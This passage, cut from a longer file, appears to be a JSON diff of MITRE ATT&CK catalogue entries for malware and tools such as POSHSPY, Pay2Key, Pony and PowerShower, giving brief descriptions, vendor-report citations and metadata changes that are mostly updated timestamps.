[TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. 
[PLEAD](https://attack.mitre.org/software/S0435) was observed in use as early as March 2017.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0435", + "external_id": "S0435" + }, + { + "source_name": "Trend Micro PLEAD RTLO", + "description": "Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/" + }, + { + "source_name": "TrendMicro BlackTech June 2017", + "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/" + }, + { + "source_name": "PLEAD", + "description": "PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO)(Citation: TrendMicro BlackTech June 2017)" + }, + { + "source_name": "JPCert PLEAD Downloader June 2018", + "description": "Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.", + "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" + }, + { + "source_name": "JPCert TSCookie March 2018", + "description": "Tomonaga, S. (2018, March 6). Malware \u201cTSCookie\u201d. 
Retrieved May 6, 2020.", + "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PLEAD" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tatsuya Daitoku, Cyber Defense Institute, Inc.", + "Hannah S" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 19:04:32.446000+00:00\", \"old_value\": \"2025-04-16 20:38:31.485000+00:00\"}, \"root['x_mitre_contributors'][1]\": {\"new_value\": \"Hannah S\", \"old_value\": \"Hannah Simes, BT Security\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--5e595477-2e78-4ce7-ae42-e0b059b17808", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:43:31.381000+00:00", + "name": "POSHSPY", + "description": "[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0150", + "external_id": "S0150" + }, + { + "source_name": "POSHSPY", + "description": "(Citation: FireEye POSHSPY April 2017)" + }, + { + "source_name": "FireEye POSHSPY April 2017", + "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). 
Retrieved April 5, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "POSHSPY" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:31.381000+00:00\", \"old_value\": \"2025-04-16 20:38:11.901000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--e85cae1a-bce3-4ac4-b36b-b00acac0567b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-04-16 17:43:42.724000+00:00", + "modified": "2025-04-25 14:44:58.949000+00:00", + "name": "POWERTON", + "description": "[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0371", + "external_id": "S0371" + }, + { + "source_name": "FireEye APT33 Guardrail", + "description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. 
Retrieved January 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "POWERTON" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:58.949000+00:00\", \"old_value\": \"2025-04-16 20:38:41.138000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:38.309000+00:00", + "name": "POWRUNER", + "description": "[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0184", + "external_id": "S0184" + }, + { + "source_name": "POWRUNER", + "description": "(Citation: FireEye APT34 Dec 2017)" + }, + { + "source_name": "FireEye APT34 Dec 2017", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. 
Retrieved December 20, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "POWRUNER" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:38.309000+00:00\", \"old_value\": \"2025-04-16 20:37:54.652000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--a52edc76-328d-4596-85e7-d56ef5a9eb69", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:11.426000+00:00", + "modified": "2025-04-25 14:45:25.272000+00:00", + "name": "Pass-The-Hash Toolkit", + "description": "[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to \"pass\" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0122", + "external_id": "S0122" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. 
Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:25.272000+00:00\", \"old_value\": \"2025-04-16 20:38:54.785000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--77ca1aa3-280c-4b67-abaa-e8fb891a8f83", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-01-04 15:12:14.805000+00:00", + "modified": "2025-04-25 14:43:48.585000+00:00", + "name": "Pay2Key", + "description": "[Pay2Key](https://attack.mitre.org/software/S0556) is a ransomware written in C++ that has been used by [Fox Kitten](https://attack.mitre.org/groups/G0117) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://attack.mitre.org/software/S0556) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0556", + "external_id": "S0556" + }, + { + "source_name": "ClearkSky Fox Kitten February 2020", + "description": "ClearSky. (2020, February 16). Fox Kitten \u2013 Widespread Iranian Espionage-Offensive Campaign. 
Retrieved December 21, 2020.", + "url": "https://www.clearskysec.com/fox-kitten/" + }, + { + "source_name": "Check Point Pay2Key November 2020", + "description": "Check Point. (2020, November 6). Ransomware Alert: Pay2Key. Retrieved January 4, 2021.", + "url": "https://research.checkpoint.com/2020/ransomware-alert-pay2key/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pay2Key" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:48.585000+00:00\", \"old_value\": \"2025-04-16 20:38:18.273000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6c2550d5-a01a-4bbb-a004-6ead348ba623", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-07 15:11:17.444000+00:00", + "modified": "2025-04-25 14:43:41.735000+00:00", + "name": "Peppy", + "description": "[Peppy](https://attack.mitre.org/software/S0643) is a Python-based remote access Trojan, active since at least 2012, with similarities to [Crimson](https://attack.mitre.org/software/S0115).(Citation: Proofpoint Operation Transparent Tribe March 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0643", + "external_id": "S0643" + }, + { + "source_name": "Proofpoint Operation Transparent Tribe March 2016", + "description": "Huss, D. (2016, March 1). Operation Transparent Tribe. 
Retrieved June 8, 2016.", + "url": "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Peppy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:41.735000+00:00\", \"old_value\": \"2025-04-16 20:38:15.700000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--ae9d818d-95d0-41da-b045-9cabea1ca164", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:35.780000+00:00", + "modified": "2025-04-25 14:44:24.120000+00:00", + "name": "PinchDuke", + "description": "[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0048", + "external_id": "S0048" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. 
Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PinchDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:24.120000+00:00\", \"old_value\": \"2025-04-16 20:38:30.358000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b96680d1-5eb3-4f07-b95c-00ab904ac236", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:12.388000+00:00", + "modified": "2025-04-25 14:44:31.662000+00:00", + "name": "Pisloader", + "description": "[Pisloader](https://attack.mitre.org/software/S0124) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://attack.mitre.org/groups/G0026) and is similar to another malware family, [HTTPBrowser](https://attack.mitre.org/software/S0070), that has been used by the group. (Citation: Palo Alto DNS Requests)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0124", + "external_id": "S0124" + }, + { + "source_name": "Pisloader", + "description": "(Citation: Palo Alto DNS Requests)" + }, + { + "source_name": "Palo Alto DNS Requests", + "description": "Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. 
Retrieved August 17, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pisloader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:31.662000+00:00\", \"old_value\": \"2025-04-16 20:38:32.474000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 21:03:35.244000+00:00", + "modified": "2025-04-25 14:42:50.153000+00:00", + "name": "Pony", + "description": "[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0453", + "external_id": "S0453" + }, + { + "source_name": "Malwarebytes Pony April 2016", + "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. 
Retrieved May 21, 2020.", + "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pony" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Arie Olshtein, Check Point", + "Kobi Eisenkraft, Check Point" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:50.153000+00:00\", \"old_value\": \"2025-04-16 20:37:58.346000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:39.406000+00:00", + "name": "Power Loader", + "description": "[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0177", + "external_id": "S0177" + }, + { + "source_name": "MalwareTech Power Loader Aug 2013", + "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. 
Retrieved December 16, 2017.", + "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" + }, + { + "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013", + "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:39.406000+00:00\", \"old_value\": \"2025-04-16 20:37:55.103000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:19.746000+00:00", + "modified": "2025-04-25 14:42:30.325000+00:00", + "name": "PowerDuke", + "description": "[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. 
(Citation: Volexity PowerDuke November 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0139", + "external_id": "S0139" + }, + { + "source_name": "PowerDuke", + "description": "(Citation: Volexity PowerDuke November 2016)" + }, + { + "source_name": "Volexity PowerDuke November 2016", + "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.", + "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PowerDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:30.325000+00:00\", \"old_value\": \"2025-04-16 20:37:51.754000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--53486bc7-7748-4716-8190-e4f1fde04c53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-08 19:27:12.414000+00:00", + "modified": "2025-04-25 14:43:19.493000+00:00", + "name": "PowerShower", + "description": "[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 
2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0441", + "external_id": "S0441" + }, + { + "source_name": "Unit 42 Inception November 2018", + "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.", + "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/" + }, + { + "source_name": "Kaspersky Cloud Atlas August 2019", + "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.", + "url": "https://securelist.com/recent-cloud-atlas-activity/92016/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PowerShower" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:19.493000+00:00\", \"old_value\": \"2025-04-16 20:38:07.537000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--dcac85c1-6485-4790-84f6-de5e6f6b91dd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-21 17:23:27.855000+00:00", + "modified": "2025-04-25 14:44:50.859000+00:00", + "name": "PowerStallion", + "description": "[PowerStallion](https://attack.mitre.org/software/S0393) is a lightweight [PowerShell](https://attack.mitre.org/techniques/T1059/001) backdoor used by [Turla](https://attack.mitre.org/groups/G0010), possibly as a recovery access tool to install other 
backdoors.(Citation: ESET Turla PowerShell May 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0393", + "external_id": "S0393" + }, + { + "source_name": "ESET Turla PowerShell May 2019", + "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.", + "url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PowerStallion" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:50.859000+00:00\", \"old_value\": \"2025-04-16 20:38:38.238000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--c541efb4-e7b1-4ad6-9da8-b4e113f5dd42", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:38.517000+00:00", + "name": "Proton", + "description": "[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access (Citation: objsee mac malware 2017).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0279", + "external_id": "S0279" + }, + { + "source_name": "Proton", + "description": "(Citation: objsee mac malware 2017)." 
+ }, + { + "source_name": "objsee mac malware 2017", + "description": "Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.", + "url": "https://objective-see.com/blog/blog_0x25.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Proton" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:38.517000+00:00\", \"old_value\": \"2025-04-16 20:38:34.550000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--069af411-9b24-4e85-b26c-623d035bbe84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:34.849000+00:00", + "name": "Proxysvc", + "description": "[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. 
(Citation: McAfee GhostSecret)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0238", + "external_id": "S0238" + }, + { + "source_name": "Proxysvc", + "description": "(Citation: McAfee GhostSecret)" + }, + { + "source_name": "McAfee GhostSecret", + "description": "Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Proxysvc" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:34.849000+00:00\", \"old_value\": \"2025-04-16 20:37:53.139000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": 